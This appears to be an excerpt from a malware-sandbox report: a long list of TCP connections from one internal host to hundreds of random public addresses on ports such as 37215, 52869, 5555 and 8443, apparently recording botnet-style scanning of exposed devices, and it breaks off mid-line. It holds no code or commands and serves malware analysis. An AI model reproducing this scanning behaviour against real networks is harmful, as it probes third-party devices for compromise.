                          Source: global trafficTCP traffic: 192.168.2.23:36702 -> 95.36.0.71:8443
                          Source: global trafficTCP traffic: 192.168.2.23:33918 -> 186.74.80.35:52869
                          Source: global trafficTCP traffic: 192.168.2.23:48518 -> 173.122.150.192:8443
                          Source: global trafficTCP traffic: 192.168.2.23:56510 -> 217.208.181.28:8080
                          Source: global trafficTCP traffic: 192.168.2.23:56828 -> 144.50.58.60:81
                          Source: global trafficTCP traffic: 192.168.2.23:41554 -> 16.185.224.54:81
                          Source: global trafficTCP traffic: 192.168.2.23:60082 -> 49.30.95.191:37215
                          Source: global trafficTCP traffic: 192.168.2.23:58350 -> 160.111.162.219:8080
                          Source: global trafficTCP traffic: 192.168.2.23:49632 -> 182.28.59.175:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46638 -> 152.225.18.120:49152
                          Source: global trafficTCP traffic: 192.168.2.23:42056 -> 32.23.240.199:8080
                          Source: global trafficTCP traffic: 192.168.2.23:42232 -> 83.44.15.163:8080
                          Source: global trafficTCP traffic: 192.168.2.23:39266 -> 173.184.209.182:81
                          Source: global trafficTCP traffic: 192.168.2.23:36660 -> 213.176.82.108:37215
                          Source: global trafficTCP traffic: 192.168.2.23:46094 -> 185.189.197.94:52869
                          Source: global trafficTCP traffic: 192.168.2.23:39130 -> 11.152.191.105:8080
                          Source: global trafficTCP traffic: 192.168.2.23:43716 -> 219.17.67.235:37215
                          Source: global trafficTCP traffic: 192.168.2.23:53316 -> 12.186.198.42:8080
                          Source: global trafficTCP traffic: 192.168.2.23:40416 -> 194.243.196.252:81
                          Source: global trafficTCP traffic: 192.168.2.23:36448 -> 96.17.16.68:8080
                          Source: global trafficTCP traffic: 192.168.2.23:32944 -> 112.176.104.27:37215
                          Source: global trafficTCP traffic: 192.168.2.23:37630 -> 178.182.207.142:5555
                          Source: global trafficTCP traffic: 192.168.2.23:51470 -> 133.193.211.115:37215
                          Source: global trafficTCP traffic: 192.168.2.23:53422 -> 6.42.96.227:37215
                          Source: global trafficTCP traffic: 192.168.2.23:38924 -> 154.44.206.244:8080
                          Source: global trafficTCP traffic: 192.168.2.23:56090 -> 40.217.232.105:52869
                          Source: global trafficTCP traffic: 192.168.2.23:57580 -> 131.239.170.174:49152
                          Source: global trafficTCP traffic: 192.168.2.23:43542 -> 2.176.99.42:7574
                          Source: global trafficTCP traffic: 192.168.2.23:52996 -> 189.232.159.133:49152
                          Source: global trafficTCP traffic: 192.168.2.23:43952 -> 126.68.225.175:81
                          Source: global trafficTCP traffic: 192.168.2.23:57672 -> 11.216.21.192:52869
                          Source: global trafficTCP traffic: 192.168.2.23:60434 -> 164.17.85.186:8080
                          Source: global trafficTCP traffic: 192.168.2.23:45776 -> 142.34.122.100:8080
                          Source: global trafficTCP traffic: 192.168.2.23:42756 -> 157.160.238.119:7574
                          Source: global trafficTCP traffic: 192.168.2.23:39974 -> 182.70.170.130:52869
                          Source: global trafficTCP traffic: 192.168.2.23:46428 -> 87.253.23.67:8443
                          Source: global trafficTCP traffic: 192.168.2.23:42444 -> 40.168.7.236:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46920 -> 35.122.67.94:8080
                          Source: global trafficTCP traffic: 192.168.2.23:35208 -> 19.116.56.119:8080
                          Source: global trafficTCP traffic: 192.168.2.23:41388 -> 28.168.205.128:5555
                          Source: global trafficTCP traffic: 192.168.2.23:46810 -> 180.89.169.85:8080
                          Source: global trafficTCP traffic: 192.168.2.23:60502 -> 103.133.112.54:37215
                          Source: global trafficTCP traffic: 192.168.2.23:46798 -> 49.121.221.50:5555
                          Source: global trafficTCP traffic: 192.168.2.23:39856 -> 50.26.175.172:7574
                          Source: global trafficTCP traffic: 192.168.2.23:55124 -> 55.226.166.165:52869
                          Source: global trafficTCP traffic: 192.168.2.23:38808 -> 216.93.120.15:37215
                          Source: global trafficTCP traffic: 192.168.2.23:49802 -> 122.42.97.57:49152
                          Source: global trafficTCP traffic: 192.168.2.23:48480 -> 208.121.43.95:8080
                          Source: global trafficTCP traffic: 192.168.2.23:43660 -> 104.109.35.63:8443
                          Source: global trafficTCP traffic: 192.168.2.23:42678 -> 206.105.5.142:8443
                          Source: global trafficTCP traffic: 192.168.2.23:39712 -> 75.73.55.134:81
                          Source: global trafficTCP traffic: 192.168.2.23:56110 -> 141.226.112.48:5555
                          Source: global trafficTCP traffic: 192.168.2.23:33402 -> 34.69.23.176:37215
                          Source: global trafficTCP traffic: 192.168.2.23:34628 -> 90.26.83.230:8080
                          Source: global trafficTCP traffic: 192.168.2.23:43266 -> 2.200.21.111:52869
                          Source: global trafficTCP traffic: 192.168.2.23:55798 -> 9.219.58.246:49152
                          Source: global trafficTCP traffic: 192.168.2.23:52562 -> 179.28.189.224:52869
                          Source: global trafficTCP traffic: 192.168.2.23:49274 -> 137.195.163.37:8443
                          Source: global trafficTCP traffic: 192.168.2.23:56380 -> 162.6.132.254:8080
                          Source: global trafficTCP traffic: 192.168.2.23:36358 -> 112.65.113.89:8443
                          Source: global trafficTCP traffic: 192.168.2.23:45098 -> 110.90.55.169:81
                          Source: global trafficTCP traffic: 192.168.2.23:51500 -> 189.134.48.15:8080
                          Source: global trafficTCP traffic: 192.168.2.23:45834 -> 83.57.65.59:8080
                          Source: global trafficTCP traffic: 192.168.2.23:48840 -> 164.96.150.142:8080
                          Source: global trafficTCP traffic: 192.168.2.23:33918 -> 204.119.212.109:8080
                          Source: global trafficTCP traffic: 192.168.2.23:54498 -> 79.161.24.176:49152
                          Source: global trafficTCP traffic: 192.168.2.23:50678 -> 75.174.137.33:8080
                          Source: global trafficTCP traffic: 192.168.2.23:40166 -> 39.152.6.71:52869
                          Source: global trafficTCP traffic: 192.168.2.23:38230 -> 213.36.93.175:8443
                          Source: global trafficTCP traffic: 192.168.2.23:46058 -> 19.113.73.17:8080
                          Source: global trafficTCP traffic: 192.168.2.23:57428 -> 83.140.37.92:8080
                          Source: global trafficTCP traffic: 192.168.2.23:38954 -> 130.30.19.29:49152
                          Source: global trafficTCP traffic: 192.168.2.23:52052 -> 71.137.97.50:81
                          Source: global trafficTCP traffic: 192.168.2.23:39862 -> 117.145.74.225:7574
                          Source: global trafficTCP traffic: 192.168.2.23:56700 -> 138.175.204.158:5555
                          Source: global trafficTCP traffic: 192.168.2.23:35342 -> 195.86.16.208:8080
                          Source: global trafficTCP traffic: 192.168.2.23:55870 -> 200.115.122.89:37215
                          Source: global trafficTCP traffic: 192.168.2.23:47842 -> 76.99.198.96:81
                          Source: global trafficTCP traffic: 192.168.2.23:33144 -> 209.178.207.189:8080
                          Source: global trafficTCP traffic: 192.168.2.23:38184 -> 4.110.94.140:81
                          Source: global trafficTCP traffic: 192.168.2.23:55774 -> 123.55.16.248:37215
                          Source: global trafficTCP traffic: 192.168.2.23:54010 -> 103.166.153.117:5555
                          Source: global trafficTCP traffic: 192.168.2.23:41684 -> 174.101.66.69:8080
                          Source: global trafficTCP traffic: 192.168.2.23:54174 -> 31.253.153.1:8443
                          Source: global trafficTCP traffic: 192.168.2.23:51292 -> 219.44.149.12:49152
                          Source: global trafficTCP traffic: 192.168.2.23:60694 -> 145.115.91.50:81
                          Source: global trafficTCP traffic: 192.168.2.23:45460 -> 122.120.11.163:49152
                          Source: global trafficTCP traffic: 192.168.2.23:35052 -> 81.79.57.93:49152
                          Source: global trafficTCP traffic: 192.168.2.23:50622 -> 203.222.143.94:8080
                          Source: global trafficTCP traffic: 192.168.2.23:42000 -> 120.185.75.38:52869
                          Source: global trafficTCP traffic: 192.168.2.23:48856 -> 89.109.107.87:5555
                          Source: global trafficTCP traffic: 192.168.2.23:60210 -> 104.69.106.155:81
                          Source: global trafficTCP traffic: 192.168.2.23:43618 -> 33.219.124.225:8080
                          Source: global trafficTCP traffic: 192.168.2.23:56282 -> 49.60.182.140:8080
                          Source: global trafficTCP traffic: 192.168.2.23:36294 -> 106.178.208.243:8080
                          Source: global trafficTCP traffic: 192.168.2.23:38484 -> 162.119.193.156:7574
                          Source: global trafficTCP traffic: 192.168.2.23:40120 -> 87.27.190.244:37215
                          Source: global trafficTCP traffic: 192.168.2.23:44642 -> 126.144.178.253:8443
                          Source: global trafficTCP traffic: 192.168.2.23:60954 -> 119.236.192.141:37215
                          Source: global trafficTCP traffic: 192.168.2.23:51592 -> 4.63.252.30:8080
                          Source: global trafficTCP traffic: 192.168.2.23:53468 -> 54.122.133.187:37215
                          Source: global trafficTCP traffic: 192.168.2.23:35270 -> 27.49.23.52:49152
                          Source: global trafficTCP traffic: 192.168.2.23:34590 -> 65.177.53.188:7574
                          Source: global trafficTCP traffic: 192.168.2.23:54270 -> 72.151.192.215:8080
                          Source: global trafficTCP traffic: 192.168.2.23:33902 -> 137.207.100.87:8443
                          Source: global trafficTCP traffic: 192.168.2.23:43854 -> 8.96.114.127:37215
                          Source: global trafficTCP traffic: 192.168.2.23:33356 -> 75.118.139.121:81
                          Source: global trafficTCP traffic: 192.168.2.23:56570 -> 126.130.134.110:5555
                          Source: global trafficTCP traffic: 192.168.2.23:36466 -> 169.173.175.187:81
                          Source: global trafficTCP traffic: 192.168.2.23:42176 -> 219.210.250.186:7574
                          Source: global trafficTCP traffic: 192.168.2.23:51170 -> 25.224.91.27:37215
                          Source: global trafficTCP traffic: 192.168.2.23:54970 -> 12.93.192.60:7574
                          Source: global trafficTCP traffic: 192.168.2.23:57152 -> 83.219.142.62:8080
                          Source: global trafficTCP traffic: 192.168.2.23:51284 -> 207.19.171.61:7574
                          Source: global trafficTCP traffic: 192.168.2.23:36866 -> 197.34.33.4:49152
                          Source: global trafficTCP traffic: 192.168.2.23:46144 -> 115.149.26.31:7574
                          Source: global trafficTCP traffic: 192.168.2.23:47296 -> 123.193.230.204:37215
                          Source: global trafficTCP traffic: 192.168.2.23:43412 -> 1.102.177.191:49152
                          Source: global trafficTCP traffic: 192.168.2.23:55832 -> 205.138.220.164:81
                          Source: global trafficTCP traffic: 192.168.2.23:58176 -> 60.91.131.86:52869
                          Source: global trafficTCP traffic: 192.168.2.23:56040 -> 175.195.226.130:52869
                          Source: global trafficTCP traffic: 192.168.2.23:34414 -> 116.102.42.120:8080
                          Source: global trafficTCP traffic: 192.168.2.23:38690 -> 58.170.123.16:37215
                          Source: global trafficTCP traffic: 192.168.2.23:59552 -> 146.15.194.66:8080
                          Source: global trafficTCP traffic: 192.168.2.23:52244 -> 152.79.242.212:52869
                          Source: global trafficTCP traffic: 192.168.2.23:56284 -> 13.169.176.0:81
                          Source: global trafficTCP traffic: 192.168.2.23:42034 -> 145.78.150.14:52869
                          Source: global trafficTCP traffic: 192.168.2.23:53522 -> 13.156.98.231:37215
                          Source: global trafficTCP traffic: 192.168.2.23:50434 -> 147.118.25.160:8080
                          Source: global trafficTCP traffic: 192.168.2.23:36548 -> 194.212.2.39:8443
                          Source: global trafficTCP traffic: 192.168.2.23:59884 -> 87.59.59.83:49152
                          Source: global trafficTCP traffic: 192.168.2.23:43982 -> 217.167.178.11:81
                          Source: global trafficTCP traffic: 192.168.2.23:35682 -> 76.169.13.149:8443
                          Source: global trafficTCP traffic: 192.168.2.23:50774 -> 222.215.11.152:5555
                          Source: global trafficTCP traffic: 192.168.2.23:34392 -> 78.23.102.210:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46386 -> 102.214.134.194:8443
                          Source: global trafficTCP traffic: 192.168.2.23:57706 -> 145.137.120.154:8080
                          Source: global trafficTCP traffic: 192.168.2.23:53496 -> 152.90.219.150:49152
                          Source: global trafficTCP traffic: 192.168.2.23:33080 -> 121.217.30.81:8443
                          Source: global trafficTCP traffic: 192.168.2.23:55418 -> 61.60.90.55:81
                          Source: global trafficTCP traffic: 192.168.2.23:48136 -> 207.174.76.62:8080
                          Source: global trafficTCP traffic: 192.168.2.23:47076 -> 99.175.24.226:8443
                          Source: global trafficTCP traffic: 192.168.2.23:39840 -> 54.239.14.65:8080
                          Source: global trafficTCP traffic: 192.168.2.23:55352 -> 188.227.158.27:5555
                          Source: global trafficTCP traffic: 192.168.2.23:55068 -> 177.40.229.174:8080
                          Source: global trafficTCP traffic: 192.168.2.23:37154 -> 46.240.25.117:8443
                          Source: global trafficTCP traffic: 192.168.2.23:42274 -> 122.173.242.132:7574
                          Source: global trafficTCP traffic: 192.168.2.23:48528 -> 81.78.52.168:49152
                          Source: global trafficTCP traffic: 192.168.2.23:40772 -> 47.57.146.158:49152
                          Source: global trafficTCP traffic: 192.168.2.23:40614 -> 130.120.24.197:7574
                          Source: global trafficTCP traffic: 192.168.2.23:39650 -> 166.236.5.250:49152
                          Source: global trafficTCP traffic: 192.168.2.23:53784 -> 149.186.69.66:8080
                          Source: global trafficTCP traffic: 192.168.2.23:43918 -> 152.114.237.184:8443
                          Source: global trafficTCP traffic: 192.168.2.23:55114 -> 83.199.233.176:49152
                          Source: global trafficTCP traffic: 192.168.2.23:34338 -> 130.102.160.74:49152
                          Source: global trafficTCP traffic: 192.168.2.23:48572 -> 83.122.95.25:8080
                          Source: global trafficTCP traffic: 192.168.2.23:54086 -> 183.127.20.248:7574
                          Source: global trafficTCP traffic: 192.168.2.23:37316 -> 126.129.153.234:8443
                          Source: global trafficTCP traffic: 192.168.2.23:36330 -> 89.43.178.168:7574
                          Source: global trafficTCP traffic: 192.168.2.23:58492 -> 101.60.186.9:81
                          Source: global trafficTCP traffic: 192.168.2.23:58570 -> 117.37.15.228:5555
                          Source: global trafficTCP traffic: 192.168.2.23:53928 -> 105.242.110.44:52869
                          Source: global trafficTCP traffic: 192.168.2.23:35810 -> 17.202.225.253:37215
                          Source: global trafficTCP traffic: 192.168.2.23:45248 -> 9.46.120.73:5555
                          Source: global trafficTCP traffic: 192.168.2.23:39956 -> 59.226.146.96:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46734 -> 43.120.175.110:7574
                          Source: global trafficTCP traffic: 192.168.2.23:54376 -> 31.156.62.140:8443
                          Source: global trafficTCP traffic: 192.168.2.23:59874 -> 124.242.109.222:37215
                          Source: global trafficTCP traffic: 192.168.2.23:54448 -> 92.100.0.194:7574
                          Source: global trafficTCP traffic: 192.168.2.23:46262 -> 11.35.71.45:81
                          Source: global trafficTCP traffic: 192.168.2.23:51938 -> 24.1.57.126:52869
                          Source: global trafficTCP traffic: 192.168.2.23:56210 -> 96.235.20.121:8080
                          Source: global trafficTCP traffic: 192.168.2.23:42184 -> 151.21.199.120:5555
                          Source: global trafficTCP traffic: 192.168.2.23:49564 -> 25.87.237.51:52869
                          Source: global trafficTCP traffic: 192.168.2.23:43624 -> 66.114.253.203:8443
                          Source: global trafficTCP traffic: 192.168.2.23:46848 -> 130.111.55.248:8080
                          Source: global trafficTCP traffic: 192.168.2.23:54586 -> 17.229.113.84:49152
                          Source: global trafficTCP traffic: 192.168.2.23:55462 -> 133.165.216.47:37215
                          Source: global trafficTCP traffic: 192.168.2.23:57270 -> 189.247.217.62:5555
                          Source: global trafficTCP traffic: 192.168.2.23:46802 -> 82.116.24.152:8443
                          Source: global trafficTCP traffic: 192.168.2.23:33576 -> 25.87.53.113:8080
                          Source: global trafficTCP traffic: 192.168.2.23:47928 -> 159.42.57.237:49152
                          Source: global trafficTCP traffic: 192.168.2.23:39132 -> 220.139.122.238:8443
                          Source: global trafficTCP traffic: 192.168.2.23:48918 -> 60.138.201.97:52869
                          Source: global trafficTCP traffic: 192.168.2.23:45688 -> 194.204.98.109:49152
                          Source: global trafficTCP traffic: 192.168.2.23:38136 -> 8.209.26.108:8080
                          Source: global trafficTCP traffic: 192.168.2.23:57852 -> 115.232.98.88:81
                          Source: global trafficTCP traffic: 192.168.2.23:48388 -> 145.55.30.154:7574
                          Source: global trafficTCP traffic: 192.168.2.23:51792 -> 83.22.235.193:8080
                          Source: global trafficTCP traffic: 192.168.2.23:50816 -> 175.22.201.208:8443
                          Source: global trafficTCP traffic: 192.168.2.23:41150 -> 88.103.118.246:52869
                          Source: global trafficTCP traffic: 192.168.2.23:58952 -> 163.96.184.101:5555
                          Source: global trafficTCP traffic: 192.168.2.23:52400 -> 122.36.114.106:49152
                          Source: global trafficTCP traffic: 192.168.2.23:50268 -> 30.101.205.242:49152
                          Source: global trafficTCP traffic: 192.168.2.23:46854 -> 132.219.186.30:8443
                          Source: global trafficTCP traffic: 192.168.2.23:37044 -> 21.203.17.96:8080
                          Source: global trafficTCP traffic: 192.168.2.23:44348 -> 31.182.206.13:8080
                          Source: global trafficTCP traffic: 192.168.2.23:33436 -> 71.10.2.3:52869
                          Source: global trafficTCP traffic: 192.168.2.23:43158 -> 180.167.207.34:81
                          Source: global trafficTCP traffic: 192.168.2.23:55370 -> 205.155.133.95:52869
                          Source: global trafficTCP traffic: 192.168.2.23:50800 -> 184.245.192.241:8443
                          Source: global trafficTCP traffic: 192.168.2.23:35286 -> 75.61.94.118:8080
                          Source: global trafficTCP traffic: 192.168.2.23:47884 -> 187.37.64.91:8080
                          Source: global trafficTCP traffic: 192.168.2.23:58054 -> 42.127.221.91:7574
                          Source: global trafficTCP traffic: 192.168.2.23:37386 -> 150.179.62.203:52869
                          Source: global trafficTCP traffic: 192.168.2.23:49404 -> 29.49.149.205:8080
                          Source: global trafficTCP traffic: 192.168.2.23:60978 -> 86.218.33.164:8080
                          Source: global trafficTCP traffic: 192.168.2.23:60300 -> 211.199.132.181:81
                          Source: global trafficTCP traffic: 192.168.2.23:59334 -> 145.76.97.152:8080
                          Source: global trafficTCP traffic: 192.168.2.23:39052 -> 28.212.76.191:81
                          Source: global trafficTCP traffic: 192.168.2.23:46556 -> 45.60.67.75:52869
                          Source: global trafficTCP traffic: 192.168.2.23:49442 -> 154.137.192.46:8080
                          Source: global trafficTCP traffic: 192.168.2.23:45272 -> 183.56.193.84:49152
                          Source: global trafficTCP traffic: 192.168.2.23:41866 -> 198.200.177.227:7574
                          Source: global trafficTCP traffic: 192.168.2.23:36018 -> 98.248.158.185:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46932 -> 46.208.194.138:52869
                          Source: global trafficTCP traffic: 192.168.2.23:34928 -> 79.238.9.113:81
                          Source: global trafficTCP traffic: 192.168.2.23:41954 -> 82.109.48.98:8443
                          Source: global trafficTCP traffic: 192.168.2.23:38202 -> 110.33.28.139:8080
                          Source: global trafficTCP traffic: 192.168.2.23:60384 -> 155.163.154.83:81
                          Source: global trafficTCP traffic: 192.168.2.23:56156 -> 5.159.128.139:49152
                          Source: global trafficTCP traffic: 192.168.2.23:60500 -> 49.167.144.85:81
                          Source: global trafficTCP traffic: 192.168.2.23:47954 -> 97.132.168.27:37215
                          Source: global trafficTCP traffic: 192.168.2.23:54200 -> 118.51.93.48:81
                          Source: global trafficTCP traffic: 192.168.2.23:48250 -> 57.37.42.243:5555
                          Source: global trafficTCP traffic: 192.168.2.23:40758 -> 119.44.231.19:52869
                          Source: global trafficTCP traffic: 192.168.2.23:46212 -> 179.76.176.91:8080
                          Source: global trafficTCP traffic: 192.168.2.23:34938 -> 120.81.95.181:8080
                          Source: global trafficTCP traffic: 192.168.2.23:56180 -> 168.48.142.0:81
                          Source: global trafficTCP traffic: 192.168.2.23:55754 -> 179.82.28.238:81
                          Source: global trafficTCP traffic: 192.168.2.23:47164 -> 217.41.84.108:7574
                          Source: global trafficTCP traffic: 192.168.2.23:54920 -> 176.181.36.227:8443
                          Source: global trafficTCP traffic: 192.168.2.23:47796 -> 174.117.110.102:8080
                          Source: global trafficTCP traffic: 192.168.2.23:46974 -> 214.65.33.92:7574
                          Source: global trafficTCP traffic: 192.168.2.23:59426 -> 6.106.185.52:81
                          Source: global trafficTCP traffic: 192.168.2.23:41420 -> 95.44.206.204:8080
                          Source: global trafficTCP traffic: 192.168.2.23:50222 -> 143.222.121.131:8080
                          Source: global trafficTCP traffic: 192.168.2.23:47828 -> 164.68.125.39:8443
                          Source: global trafficTCP traffic: 192.168.2.23:41100 -> 68.182.20.215:8080
                          Source: global trafficTCP traffic: 192.168.2.23:33006 -> 15.115.219.33:8080
                          Source: global trafficTCP traffic: 192.168.2.23:43442 -> 138.81.221.137:49152
                          Source: global trafficTCP traffic: 192.168.2.23:60426 -> 4.178.77.136:49152
                          Source: global trafficTCP traffic: 192.168.2.23:55836 -> 111.99.86.156:8080
                          Source: global trafficTCP traffic: 192.168.2.23:45146 -> 121.219.237.97:81
                          Source: global trafficTCP traffic: 192.168.2.23:58004 -> 5